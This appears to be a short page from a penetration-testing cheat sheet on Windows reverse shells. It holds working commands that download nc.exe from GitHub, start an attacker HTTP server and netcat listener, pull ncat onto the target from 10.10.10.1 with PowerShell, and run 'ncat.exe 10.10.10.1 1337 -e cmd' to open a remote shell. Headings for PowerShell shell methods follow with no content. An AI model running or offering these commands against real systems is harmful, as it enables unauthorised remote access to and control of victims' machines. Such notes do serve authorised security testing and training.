Shells

Cmd ncat

#DOWNLOAD NCAT FROM WEB
#32bit
wget https://raw.githubusercontent.com/int0x33/nc.exe/master/nc.exe

#64bit
wget https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe


#attacker
python3 -m http.server 8888
nc -lnvp 1337



#DOWNLOAD NCAT FROM ATTACKER 
#32bit
iwr -uri "http://10.10.10.1:8888/nc.exe" -Outfile ncat.exe

#64bit
iwr -uri "http://10.10.10.1:8888/nc64.exe" -Outfile ncat.exe


C:\Current\Path\ncat.exe 10.10.10.1 1337 -e cmd

Powershell with Invoke-PowerShellTcp.ps1

Powershell with Base64 TCPClient

Script

Last updated